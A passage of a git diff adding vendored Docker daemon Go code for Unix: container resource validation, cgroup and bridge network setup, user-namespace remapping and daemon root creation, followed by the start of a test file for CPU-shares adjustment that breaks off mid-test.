adjustments + if resources.BlkioWeight > 0 && !sysInfo.BlkioWeight { + warnings = append(warnings, "Your kernel does not support Block I/O weight or the cgroup is not mounted. Weight discarded.") + logrus.Warn("Your kernel does not support Block I/O weight or the cgroup is not mounted. Weight discarded.") + resources.BlkioWeight = 0 + } + if resources.BlkioWeight > 0 && (resources.BlkioWeight < 10 || resources.BlkioWeight > 1000) { + return warnings, fmt.Errorf("Range of blkio weight is from 10 to 1000") + } + if resources.IOMaximumBandwidth != 0 || resources.IOMaximumIOps != 0 { + return warnings, fmt.Errorf("Invalid QoS settings: %s does not support Maximum IO Bandwidth or Maximum IO IOps", runtime.GOOS) + } + if len(resources.BlkioWeightDevice) > 0 && !sysInfo.BlkioWeightDevice { + warnings = append(warnings, "Your kernel does not support Block I/O weight_device or the cgroup is not mounted. Weight-device discarded.") + logrus.Warn("Your kernel does not support Block I/O weight_device or the cgroup is not mounted. Weight-device discarded.") + resources.BlkioWeightDevice = []*pblkiodev.WeightDevice{} + } + if len(resources.BlkioDeviceReadBps) > 0 && !sysInfo.BlkioReadBpsDevice { + warnings = append(warnings, "Your kernel does not support BPS Block I/O read limit or the cgroup is not mounted. Block I/O BPS read limit discarded.") + logrus.Warn("Your kernel does not support BPS Block I/O read limit or the cgroup is not mounted. Block I/O BPS read limit discarded") + resources.BlkioDeviceReadBps = []*pblkiodev.ThrottleDevice{} + } + if len(resources.BlkioDeviceWriteBps) > 0 && !sysInfo.BlkioWriteBpsDevice { + warnings = append(warnings, "Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.") + logrus.Warn("Your kernel does not support BPS Block I/O write limit or the cgroup is not mounted. Block I/O BPS write limit discarded.") + resources.BlkioDeviceWriteBps = []*pblkiodev.ThrottleDevice{} + } + if len(resources.BlkioDeviceReadIOps) > 0 && !sysInfo.BlkioReadIOpsDevice { + warnings = append(warnings, "Your kernel does not support IOPS Block read limit or the cgroup is not mounted. Block I/O IOPS read limit discarded.") + logrus.Warn("Your kernel does not support IOPS Block I/O read limit in IO or the cgroup is not mounted. Block I/O IOPS read limit discarded.") + resources.BlkioDeviceReadIOps = []*pblkiodev.ThrottleDevice{} + } + if len(resources.BlkioDeviceWriteIOps) > 0 && !sysInfo.BlkioWriteIOpsDevice { + warnings = append(warnings, "Your kernel does not support IOPS Block write limit or the cgroup is not mounted. Block I/O IOPS write limit discarded.") + logrus.Warn("Your kernel does not support IOPS Block I/O write limit or the cgroup is not mounted. Block I/O IOPS write limit discarded.") + resources.BlkioDeviceWriteIOps = []*pblkiodev.ThrottleDevice{} + } + + return warnings, nil +} + +func (daemon *Daemon) getCgroupDriver() string { + cgroupDriver := cgroupFsDriver + + if UsingSystemd(daemon.configStore) { + cgroupDriver = cgroupSystemdDriver + } + return cgroupDriver +} + +// getCD gets the raw value of the native.cgroupdriver option, if set. +func getCD(config *Config) string { + for _, option := range config.ExecOptions { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil || !strings.EqualFold(key, "native.cgroupdriver") { + continue + } + return val + } + return "" +} + +// VerifyCgroupDriver validates native.cgroupdriver +func VerifyCgroupDriver(config *Config) error { + cd := getCD(config) + if cd == "" || cd == cgroupFsDriver || cd == cgroupSystemdDriver { + return nil + } + return fmt.Errorf("native.cgroupdriver option %s not supported", cd) +} + +// UsingSystemd returns true if cli option includes native.cgroupdriver=systemd +func UsingSystemd(config *Config) bool { + return getCD(config) == cgroupSystemdDriver +} + +// verifyPlatformContainerSettings performs platform-specific validation of the +// hostconfig and config structures. +func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) { + warnings := []string{} + sysInfo := sysinfo.New(true) + + warnings, err := daemon.verifyExperimentalContainerSettings(hostConfig, config) + if err != nil { + return warnings, err + } + + w, err := verifyContainerResources(&hostConfig.Resources, sysInfo, update) + + // no matter err is nil or not, w could have data in itself. + warnings = append(warnings, w...) + + if err != nil { + return warnings, err + } + + if hostConfig.ShmSize < 0 { + return warnings, fmt.Errorf("SHM size can not be less than 0") + } + + if hostConfig.OomScoreAdj < -1000 || hostConfig.OomScoreAdj > 1000 { + return warnings, fmt.Errorf("Invalid value %d, range for oom score adj is [-1000, 1000]", hostConfig.OomScoreAdj) + } + + // ip-forwarding does not affect container with '--net=host' (or '--net=none') + if sysInfo.IPv4ForwardingDisabled && !(hostConfig.NetworkMode.IsHost() || hostConfig.NetworkMode.IsNone()) { + warnings = append(warnings, "IPv4 forwarding is disabled. Networking will not work.") + logrus.Warn("IPv4 forwarding is disabled. Networking will not work") + } + // check for various conflicting options with user namespaces + if daemon.configStore.RemappedRoot != "" && hostConfig.UsernsMode.IsPrivate() { + if hostConfig.Privileged { + return warnings, fmt.Errorf("Privileged mode is incompatible with user namespaces") + } + if hostConfig.NetworkMode.IsHost() && !hostConfig.UsernsMode.IsHost() { + return warnings, fmt.Errorf("Cannot share the host's network namespace when user namespaces are enabled") + } + if hostConfig.PidMode.IsHost() && !hostConfig.UsernsMode.IsHost() { + return warnings, fmt.Errorf("Cannot share the host PID namespace when user namespaces are enabled") + } + } + if hostConfig.CgroupParent != "" && UsingSystemd(daemon.configStore) { + // CgroupParent for systemd cgroup should be named as "xxx.slice" + if len(hostConfig.CgroupParent) <= 6 || !strings.HasSuffix(hostConfig.CgroupParent, ".slice") { + return warnings, fmt.Errorf("cgroup-parent for systemd cgroup should be a valid slice named as \"xxx.slice\"") + } + } + if hostConfig.Runtime == "" { + hostConfig.Runtime = daemon.configStore.GetDefaultRuntimeName() + } + + if rt := daemon.configStore.GetRuntime(hostConfig.Runtime); rt == nil { + return warnings, fmt.Errorf("Unknown runtime specified %s", hostConfig.Runtime) + } + + return warnings, nil +} + +// platformReload update configuration with platform specific options +func (daemon *Daemon) platformReload(config *Config) map[string]string { + if config.IsValueSet("runtimes") { + daemon.configStore.Runtimes = config.Runtimes + // Always set the default one + daemon.configStore.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} + } + + if config.DefaultRuntime != "" { + daemon.configStore.DefaultRuntime = config.DefaultRuntime + } + + // Update attributes + var runtimeList bytes.Buffer + for name, rt := range daemon.configStore.Runtimes { + if runtimeList.Len() > 0 { + runtimeList.WriteRune(' ') + } + runtimeList.WriteString(fmt.Sprintf("%s:%s", name, rt)) + } + + return map[string]string{ + "runtimes": runtimeList.String(), + "default-runtime": daemon.configStore.DefaultRuntime, + } +} + +// verifyDaemonSettings performs validation of daemon config struct +func verifyDaemonSettings(config *Config) error { + // Check for mutually incompatible config options + if config.bridgeConfig.Iface != "" && config.bridgeConfig.IP != "" { + return fmt.Errorf("You specified -b & --bip, mutually exclusive options. Please specify only one") + } + if !config.bridgeConfig.EnableIPTables && !config.bridgeConfig.InterContainerCommunication { + return fmt.Errorf("You specified --iptables=false with --icc=false. ICC=false uses iptables to function. Please set --icc or --iptables to true") + } + if !config.bridgeConfig.EnableIPTables && config.bridgeConfig.EnableIPMasq { + config.bridgeConfig.EnableIPMasq = false + } + if err := VerifyCgroupDriver(config); err != nil { + return err + } + if config.CgroupParent != "" && UsingSystemd(config) { + if len(config.CgroupParent) <= 6 || !strings.HasSuffix(config.CgroupParent, ".slice") { + return fmt.Errorf("cgroup-parent for systemd cgroup should be a valid slice named as \"xxx.slice\"") + } + } + + if config.DefaultRuntime == "" { + config.DefaultRuntime = stockRuntimeName + } + if config.Runtimes == nil { + config.Runtimes = make(map[string]types.Runtime) + } + config.Runtimes[stockRuntimeName] = types.Runtime{Path: DefaultRuntimeBinary} + + return nil +} + +// checkSystem validates platform-specific requirements +func checkSystem() error { + if os.Geteuid() != 0 { + return fmt.Errorf("The Docker daemon needs to be run as root") + } + return checkKernel() +} + +// configureMaxThreads sets the Go runtime max threads threshold +// which is 90% of the kernel setting from /proc/sys/kernel/threads-max +func configureMaxThreads(config *Config) error { + mt, err := ioutil.ReadFile("/proc/sys/kernel/threads-max") + if err != nil { + return err + } + mtint, err := strconv.Atoi(strings.TrimSpace(string(mt))) + if err != nil { + return err + } + maxThreads := (mtint / 100) * 90 + debug.SetMaxThreads(maxThreads) + logrus.Debugf("Golang's threads limit set to %d", maxThreads) + return nil +} + +// configureKernelSecuritySupport configures and validates security support for the kernel +func configureKernelSecuritySupport(config *Config, driverName string) error { + if config.EnableSelinuxSupport { + if !selinuxEnabled() { + logrus.Warn("Docker could not enable SELinux on the host system") + } + } else { + selinuxSetDisabled() + } + return nil +} + +func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { + netOptions, err := daemon.networkOptions(config, daemon.PluginStore, activeSandboxes) + if err != nil { + return nil, err + } + + controller, err := libnetwork.New(netOptions...) + if err != nil { + return nil, fmt.Errorf("error obtaining controller instance: %v", err) + } + + if len(activeSandboxes) > 0 { + logrus.Info("There are old running containers, the network config will not take affect") + return controller, nil + } + + // Initialize default network on "null" + if n, _ := controller.NetworkByName("none"); n == nil { + if _, err := controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(true)); err != nil { + return nil, fmt.Errorf("Error creating default \"null\" network: %v", err) + } + } + + // Initialize default network on "host" + if n, _ := controller.NetworkByName("host"); n == nil { + if _, err := controller.NewNetwork("host", "host", "", libnetwork.NetworkOptionPersist(true)); err != nil { + return nil, fmt.Errorf("Error creating default \"host\" network: %v", err) + } + } + + // Clear stale bridge network + if n, err := controller.NetworkByName("bridge"); err == nil { + if err = n.Delete(); err != nil { + return nil, fmt.Errorf("could not delete the default bridge network: %v", err) + } + } + + if !config.DisableBridge { + // Initialize default driver "bridge" + if err := initBridgeDriver(controller, config); err != nil { + return nil, err + } + } else { + removeDefaultBridgeInterface() + } + + return controller, nil +} + +func driverOptions(config *Config) []nwconfig.Option { + bridgeConfig := options.Generic{ + "EnableIPForwarding": config.bridgeConfig.EnableIPForward, + "EnableIPTables": config.bridgeConfig.EnableIPTables, + "EnableUserlandProxy": config.bridgeConfig.EnableUserlandProxy, + "UserlandProxyPath": config.bridgeConfig.UserlandProxyPath} + bridgeOption := options.Generic{netlabel.GenericData: bridgeConfig} + + dOptions := []nwconfig.Option{} + dOptions = append(dOptions, nwconfig.OptionDriverConfig("bridge", bridgeOption)) + return dOptions +} + +func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { + bridgeName := bridge.DefaultBridgeName + if config.bridgeConfig.Iface != "" { + bridgeName = config.bridgeConfig.Iface + } + netOption := map[string]string{ + bridge.BridgeName: bridgeName, + bridge.DefaultBridge: strconv.FormatBool(true), + netlabel.DriverMTU: strconv.Itoa(config.Mtu), + bridge.EnableIPMasquerade: strconv.FormatBool(config.bridgeConfig.EnableIPMasq), + bridge.EnableICC: strconv.FormatBool(config.bridgeConfig.InterContainerCommunication), + } + + // --ip processing + if config.bridgeConfig.DefaultIP != nil { + netOption[bridge.DefaultBindingIP] = config.bridgeConfig.DefaultIP.String() + } + + var ( + ipamV4Conf *libnetwork.IpamConf + ipamV6Conf *libnetwork.IpamConf + ) + + ipamV4Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} + + nwList, nw6List, err := netutils.ElectInterfaceAddresses(bridgeName) + if err != nil { + return errors.Wrap(err, "list bridge addresses failed") + } + + nw := nwList[0] + if len(nwList) > 1 && config.bridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if err != nil { + return errors.Wrap(err, "parse CIDR failed") + } + // Iterate through in case there are multiple addresses for the bridge + for _, entry := range nwList { + if fCIDR.Contains(entry.IP) { + nw = entry + break + } + } + } + + ipamV4Conf.PreferredPool = lntypes.GetIPNetCanonical(nw).String() + hip, _ := lntypes.GetHostPartIP(nw.IP, nw.Mask) + if hip.IsGlobalUnicast() { + ipamV4Conf.Gateway = nw.IP.String() + } + + if config.bridgeConfig.IP != "" { + ipamV4Conf.PreferredPool = config.bridgeConfig.IP + ip, _, err := net.ParseCIDR(config.bridgeConfig.IP) + if err != nil { + return err + } + ipamV4Conf.Gateway = ip.String() + } else if bridgeName == bridge.DefaultBridgeName && ipamV4Conf.PreferredPool != "" { + logrus.Infof("Default bridge (%s) is assigned with an IP address %s. Daemon option --bip can be used to set a preferred IP address", bridgeName, ipamV4Conf.PreferredPool) + } + + if config.bridgeConfig.FixedCIDR != "" { + _, fCIDR, err := net.ParseCIDR(config.bridgeConfig.FixedCIDR) + if err != nil { + return err + } + + ipamV4Conf.SubPool = fCIDR.String() + } + + if config.bridgeConfig.DefaultGatewayIPv4 != nil { + ipamV4Conf.AuxAddresses["DefaultGatewayIPv4"] = config.bridgeConfig.DefaultGatewayIPv4.String() + } + + var deferIPv6Alloc bool + if config.bridgeConfig.FixedCIDRv6 != "" { + _, fCIDRv6, err := net.ParseCIDR(config.bridgeConfig.FixedCIDRv6) + if err != nil { + return err + } + + // In case user has specified the daemon flag --fixed-cidr-v6 and the passed network has + // at least 48 host bits, we need to guarantee the current behavior where the containers' + // IPv6 addresses will be constructed based on the containers' interface MAC address. + // We do so by telling libnetwork to defer the IPv6 address allocation for the endpoints + // on this network until after the driver has created the endpoint and returned the + // constructed address. Libnetwork will then reserve this address with the ipam driver. + ones, _ := fCIDRv6.Mask.Size() + deferIPv6Alloc = ones <= 80 + + if ipamV6Conf == nil { + ipamV6Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} + } + ipamV6Conf.PreferredPool = fCIDRv6.String() + + // In case the --fixed-cidr-v6 is specified and the current docker0 bridge IPv6 + // address belongs to the same network, we need to inform libnetwork about it, so + // that it can be reserved with IPAM and it will not be given away to somebody else + for _, nw6 := range nw6List { + if fCIDRv6.Contains(nw6.IP) { + ipamV6Conf.Gateway = nw6.IP.String() + break + } + } + } + + if config.bridgeConfig.DefaultGatewayIPv6 != nil { + if ipamV6Conf == nil { + ipamV6Conf = &libnetwork.IpamConf{AuxAddresses: make(map[string]string)} + } + ipamV6Conf.AuxAddresses["DefaultGatewayIPv6"] = config.bridgeConfig.DefaultGatewayIPv6.String() + } + + v4Conf := []*libnetwork.IpamConf{ipamV4Conf} + v6Conf := []*libnetwork.IpamConf{} + if ipamV6Conf != nil { + v6Conf = append(v6Conf, ipamV6Conf) + } + // Initialize default network on "bridge" with the same name + _, err = controller.NewNetwork("bridge", "bridge", "", + libnetwork.NetworkOptionEnableIPv6(config.bridgeConfig.EnableIPv6), + libnetwork.NetworkOptionDriverOpts(netOption), + libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil), + libnetwork.NetworkOptionDeferIPv6Alloc(deferIPv6Alloc)) + if err != nil { + return fmt.Errorf("Error creating default \"bridge\" network: %v", err) + } + return nil +} + +// Remove default bridge interface if present (--bridge=none use case) +func removeDefaultBridgeInterface() { + if lnk, err := netlink.LinkByName(bridge.DefaultBridgeName); err == nil { + if err := netlink.LinkDel(lnk); err != nil { + logrus.Warnf("Failed to remove bridge interface (%s): %v", bridge.DefaultBridgeName, err) + } + } +} + +func (daemon *Daemon) getLayerInit() func(string) error { + return daemon.setupInitLayer +} + +// Parse the remapped root (user namespace) option, which can be one of: +// username - valid username from /etc/passwd +// username:groupname - valid username; valid groupname from /etc/group +// uid - 32-bit unsigned int valid Linux UID value +// uid:gid - uid value; 32-bit unsigned int Linux GID value +// +// If no groupname is specified, and a username is specified, an attempt +// will be made to lookup a gid for that username as a groupname +// +// If names are used, they are verified to exist in passwd/group +func parseRemappedRoot(usergrp string) (string, string, error) { + + var ( + userID, groupID int + username, groupname string + ) + + idparts := strings.Split(usergrp, ":") + if len(idparts) > 2 { + return "", "", fmt.Errorf("Invalid user/group specification in --userns-remap: %q", usergrp) + } + + if uid, err := strconv.ParseInt(idparts[0], 10, 32); err == nil { + // must be a uid; take it as valid + userID = int(uid) + luser, err := idtools.LookupUID(userID) + if err != nil { + return "", "", fmt.Errorf("Uid %d has no entry in /etc/passwd: %v", userID, err) + } + username = luser.Name + if len(idparts) == 1 { + // if the uid was numeric and no gid was specified, take the uid as the gid + groupID = userID + lgrp, err := idtools.LookupGID(groupID) + if err != nil { + return "", "", fmt.Errorf("Gid %d has no entry in /etc/group: %v", groupID, err) + } + groupname = lgrp.Name + } + } else { + lookupName := idparts[0] + // special case: if the user specified "default", they want Docker to create or + // use (after creation) the "dockremap" user/group for root remapping + if lookupName == defaultIDSpecifier { + lookupName = defaultRemappedID + } + luser, err := idtools.LookupUser(lookupName) + if err != nil && idparts[0] != defaultIDSpecifier { + // error if the name requested isn't the special "dockremap" ID + return "", "", fmt.Errorf("Error during uid lookup for %q: %v", lookupName, err) + } else if err != nil { + // special case-- if the username == "default", then we have been asked + // to create a new entry pair in /etc/{passwd,group} for which the /etc/sub{uid,gid} + // ranges will be used for the user and group mappings in user namespaced containers + _, _, err := idtools.AddNamespaceRangesUser(defaultRemappedID) + if err == nil { + return defaultRemappedID, defaultRemappedID, nil + } + return "", "", fmt.Errorf("Error during %q user creation: %v", defaultRemappedID, err) + } + username = luser.Name + if len(idparts) == 1 { + // we only have a string username, and no group specified; look up gid from username as group + group, err := idtools.LookupGroup(lookupName) + if err != nil { + return "", "", fmt.Errorf("Error during gid lookup for %q: %v", lookupName, err) + } + groupID = group.Gid + groupname = group.Name + } + } + + if len(idparts) == 2 { + // groupname or gid is separately specified and must be resolved + // to an unsigned 32-bit gid + if gid, err := strconv.ParseInt(idparts[1], 10, 32); err == nil { + // must be a gid, take it as valid + groupID = int(gid) + lgrp, err := idtools.LookupGID(groupID) + if err != nil { + return "", "", fmt.Errorf("Gid %d has no entry in /etc/passwd: %v", groupID, err) + } + groupname = lgrp.Name + } else { + // not a number; attempt a lookup + if _, err := idtools.LookupGroup(idparts[1]); err != nil { + return "", "", fmt.Errorf("Error during groupname lookup for %q: %v", idparts[1], err) + } + groupname = idparts[1] + } + } + return username, groupname, nil +} + +func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { + if runtime.GOOS != "linux" && config.RemappedRoot != "" { + return nil, nil, fmt.Errorf("User namespaces are only supported on Linux") + } + + // if the daemon was started with remapped root option, parse + // the config option to the int uid,gid values + var ( + uidMaps, gidMaps []idtools.IDMap + ) + if config.RemappedRoot != "" { + username, groupname, err := parseRemappedRoot(config.RemappedRoot) + if err != nil { + return nil, nil, err + } + if username == "root" { + // Cannot setup user namespaces with a 1-to-1 mapping; "--root=0:0" is a no-op + // effectively + logrus.Warn("User namespaces: root cannot be remapped with itself; user namespaces are OFF") + return uidMaps, gidMaps, nil + } + logrus.Infof("User namespaces: ID ranges will be mapped to subuid/subgid ranges of: %s:%s", username, groupname) + // update remapped root setting now that we have resolved them to actual names + config.RemappedRoot = fmt.Sprintf("%s:%s", username, groupname) + + uidMaps, gidMaps, err = idtools.CreateIDMappings(username, groupname) + if err != nil { + return nil, nil, fmt.Errorf("Can't create ID mappings: %v", err) + } + } + return uidMaps, gidMaps, nil +} + +func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { + config.Root = rootDir + // the docker root metadata directory needs to have execute permissions for all users (g+x,o+x) + // so that syscalls executing as non-root, operating on subdirectories of the graph root + // (e.g. mounted layers of a container) can traverse this path. + // The user namespace support will create subdirectories for the remapped root host uid:gid + // pair owned by that same uid:gid pair for proper write access to those needed metadata and + // layer content subtrees. + if _, err := os.Stat(rootDir); err == nil { + // root current exists; verify the access bits are correct by setting them + if err = os.Chmod(rootDir, 0711); err != nil { + return err + } + } else if os.IsNotExist(err) { + // no root exists yet, create it 0711 with root:root ownership + if err := os.MkdirAll(rootDir, 0711); err != nil { + return err + } + } + + // if user namespaces are enabled we will create a subtree underneath the specified root + // with any/all specified remapped root uid/gid options on the daemon creating + // a new subdirectory with ownership set to the remapped uid/gid (so as to allow + // `chdir()` to work for containers namespaced to that uid/gid) + if config.RemappedRoot != "" { + config.Root = filepath.Join(rootDir, fmt.Sprintf("%d.%d", rootUID, rootGID)) + logrus.Debugf("Creating user namespaced daemon root: %s", config.Root) + // Create the root directory if it doesn't exist + if err := idtools.MkdirAllAs(config.Root, 0700, rootUID, rootGID); err != nil { + return fmt.Errorf("Cannot create daemon root: %s: %v", config.Root, err) + } + // we also need to verify that any pre-existing directories in the path to + // the graphroot won't block access to remapped root--if any pre-existing directory + // has strict permissions that don't allow "x", container start will fail, so + // better to warn and fail now + dirPath := config.Root + for { + dirPath = filepath.Dir(dirPath) + if dirPath == "/" { + break + } + if !idtools.CanAccess(dirPath, rootUID, rootGID) { + return fmt.Errorf("A subdirectory in your graphroot path (%s) restricts access to the remapped root uid/gid; please fix by allowing 'o+x' permissions on existing directories.", config.Root) + } + } + } + return nil +} + +// registerLinks writes the links to a file. +func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error { + if hostConfig == nil || hostConfig.NetworkMode.IsUserDefined() { + return nil + } + + for _, l := range hostConfig.Links { + name, alias, err := runconfigopts.ParseLink(l) + if err != nil { + return err + } + child, err := daemon.GetContainer(name) + if err != nil { + return fmt.Errorf("Could not get container for %s", name) + } + for child.HostConfig.NetworkMode.IsContainer() { + parts := strings.SplitN(string(child.HostConfig.NetworkMode), ":", 2) + child, err = daemon.GetContainer(parts[1]) + if err != nil { + return fmt.Errorf("Could not get container for %s", parts[1]) + } + } + if child.HostConfig.NetworkMode.IsHost() { + return runconfig.ErrConflictHostNetworkAndLinks + } + if err := daemon.registerLink(container, child, alias); err != nil { + return err + } + } + + // After we load all the links into the daemon + // set them to nil on the hostconfig + return container.WriteHostConfig() +} + +// conditionalMountOnStart is a platform specific helper function during the +// container start to call mount. +func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { + return daemon.Mount(container) +} + +// conditionalUnmountOnCleanup is a platform specific helper function called +// during the cleanup of a container to unmount. +func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { + return daemon.Unmount(container) +} + +func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { + if !c.IsRunning() { + return nil, errNotRunning{c.ID} + } + stats, err := daemon.containerd.Stats(c.ID) + if err != nil { + return nil, err + } + s := &types.StatsJSON{} + cgs := stats.CgroupStats + if cgs != nil { + s.BlkioStats = types.BlkioStats{ + IoServiceBytesRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceBytesRecursive), + IoServicedRecursive: copyBlkioEntry(cgs.BlkioStats.IoServicedRecursive), + IoQueuedRecursive: copyBlkioEntry(cgs.BlkioStats.IoQueuedRecursive), + IoServiceTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoServiceTimeRecursive), + IoWaitTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoWaitTimeRecursive), + IoMergedRecursive: copyBlkioEntry(cgs.BlkioStats.IoMergedRecursive), + IoTimeRecursive: copyBlkioEntry(cgs.BlkioStats.IoTimeRecursive), + SectorsRecursive: copyBlkioEntry(cgs.BlkioStats.SectorsRecursive), + } + cpu := cgs.CpuStats + s.CPUStats = types.CPUStats{ + CPUUsage: types.CPUUsage{ + TotalUsage: cpu.CpuUsage.TotalUsage, + PercpuUsage: cpu.CpuUsage.PercpuUsage, + UsageInKernelmode: cpu.CpuUsage.UsageInKernelmode, + UsageInUsermode: cpu.CpuUsage.UsageInUsermode, + }, + ThrottlingData: types.ThrottlingData{ + Periods: cpu.ThrottlingData.Periods, + ThrottledPeriods: cpu.ThrottlingData.ThrottledPeriods, + ThrottledTime: cpu.ThrottlingData.ThrottledTime, + }, + } + mem := cgs.MemoryStats.Usage + s.MemoryStats = types.MemoryStats{ + Usage: mem.Usage, + MaxUsage: mem.MaxUsage, + Stats: cgs.MemoryStats.Stats, + Failcnt: mem.Failcnt, + Limit: mem.Limit, + } + // if the container does not set memory limit, use the machineMemory + if mem.Limit > daemon.statsCollector.machineMemory && daemon.statsCollector.machineMemory > 0 { + s.MemoryStats.Limit = daemon.statsCollector.machineMemory + } + if cgs.PidsStats != nil { + s.PidsStats = types.PidsStats{ + Current: cgs.PidsStats.Current, + } + } + } + s.Read, err = ptypes.Timestamp(stats.Timestamp) + if err != nil { + return nil, err + } + return s, nil +} + +// setDefaultIsolation determines the default isolation mode for the +// daemon to run in. This is only applicable on Windows +func (daemon *Daemon) setDefaultIsolation() error { + return nil +} + +func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { + var layers []string + for _, l := range rootfs.DiffIDs { + layers = append(layers, l.String()) + } + return types.RootFS{ + Type: rootfs.Type, + Layers: layers, + } +} + +// setupDaemonProcess sets various settings for the daemon's process +func setupDaemonProcess(config *Config) error { + // setup the daemons oom_score_adj + return setupOOMScoreAdj(config.OOMScoreAdjust) +} + +func setupOOMScoreAdj(score int) error { + f, err := os.OpenFile("/proc/self/oom_score_adj", os.O_WRONLY, 0) + if err != nil { + return err + } + + stringScore := strconv.Itoa(score) + _, err = f.WriteString(stringScore) + if os.IsPermission(err) { + // Setting oom_score_adj does not work in an + // unprivileged container. Ignore the error, but log + // it if we appear not to be in that situation. + if !rsystem.RunningInUserNS() { + logrus.Debugf("Permission denied writing %q to /proc/self/oom_score_adj", stringScore) + } + return nil + } + f.Close() + return err +} + +func (daemon *Daemon) initCgroupsPath(path string) error { + if path == "/" || path == "." { + return nil + } + + if daemon.configStore.CPURealtimePeriod == 0 && daemon.configStore.CPURealtimeRuntime == 0 { + return nil + } + + // Recursively create cgroup to ensure that the system and all parent cgroups have values set + // for the period and runtime as this limits what the children can be set to. + daemon.initCgroupsPath(filepath.Dir(path)) + + _, root, err := cgroups.FindCgroupMountpointAndRoot("cpu") + if err != nil { + return err + } + + path = filepath.Join(root, path) + sysinfo := sysinfo.New(true) + if sysinfo.CPURealtimePeriod && daemon.configStore.CPURealtimePeriod != 0 { + if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) { + return err + } + if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_period_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimePeriod, 10)), 0700); err != nil { + return err + } + } + if sysinfo.CPURealtimeRuntime && daemon.configStore.CPURealtimeRuntime != 0 { + if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) { + return err + } + if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_runtime_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimeRuntime, 10)), 0700); err != nil { + return err + } + } + return nil +} + +func (daemon *Daemon) setupSeccompProfile() error { + if daemon.configStore.SeccompProfile != "" { + daemon.seccompProfilePath = daemon.configStore.SeccompProfile + b, err := ioutil.ReadFile(daemon.configStore.SeccompProfile) + if err != nil { + return fmt.Errorf("opening seccomp profile (%s) failed: %v", daemon.configStore.SeccompProfile, err) + } + daemon.seccompProfile = b + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix_test.go b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go new file mode 100644 index 0000000000..6250d359e3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go @@ -0,0 +1,283 @@ +// +build !windows,!solaris + +package daemon + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/volume" + "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/docker/docker/volume/store" +) + +// Unix test as uses settings which are not available on Windows +func TestAdjustCPUShares(t *testing.T) { + tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + daemon := &Daemon{ + repository: tmp, + root: tmp, + } + + hostConfig := &containertypes.HostConfig{ + Resources: containertypes.Resources{CPUShares: linuxMinCPUShares - 1}, + } + daemon.adaptContainerSettings(hostConfig, true) + if hostConfig.CPUShares != linuxMinCPUShares { + t.Errorf("Expected CPUShares to be %d", linuxMinCPUShares) + } + + hostConfig.CPUShares = linuxMaxCPUShares + 1 + daemon.adaptContainerSettings(hostConfig, true) + if hostConfig.CPUShares != linuxMaxCPUShares { + t.Errorf("Expected CPUShares to be %d", linuxMaxCPUShares) + } + + hostConfig.CPUShares = 0 + daemon.adaptContainerSettings(hostConfig, true) + if hostConfig.CPUShares != 0 { + t.Error("Expected CPUShares to be unchanged") + } + + hostConfig.CPUShares = 1024 + daemon.adaptContainerSettings(hostConfig, true) + if hostConfig.CPUShares != 1024 { + t.Error("Expected CPUShares to be unchanged") + } +} + +// Unix test as uses settings which are not available on Windows +func TestAdjustCPUSharesNoAdjustment(t *testing.T) { + tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + daemon := &Daemon{ + repository: tmp, + root: tmp, + } + + hostConfig := &containertypes.HostConfig{ + Resources: containertypes.Resources{CPUShares: linuxMinCPUShares - 1}, + } + daemon.adaptContainerSettings(hostConfig, false) + if hostConfig.CPUShares != linuxMinCPUShares-1 { + t.Errorf("Expected CPUShares to be %d", linuxMinCPUShares-1) + } + + hostConfig.CPUShares = linuxMaxCPUShares + 1 + daemon.adaptContainerSettings(hostConfig, false) + if hostConfig.CPUShares != linuxMaxCPUShares+1 { + t.Errorf("Expected CPUShares to be %d", linuxMaxCPUShares+1) + } + + hostConfig.CPUShares = 0 + daemon.adaptContainerSettings(hostConfig, false) + if hostConfig.CPUShares != 0 { + t.Error("Expected CPUShares to be unchanged") + } + + hostConfig.CPUShares = 1024 + daemon.adaptContainerSettings(hostConfig, false) + if hostConfig.CPUShares != 1024 { + t.Error("Expected CPUShares to be unchanged") + } +} + +// Unix test as uses settings which are not available on Windows +func TestParseSecurityOptWithDeprecatedColon(t *testing.T) { + container := &container.Container{} + config := &containertypes.HostConfig{} + + // test apparmor + config.SecurityOpt = []string{"apparmor=test_profile"} + if err := parseSecurityOpt(container, config); err != 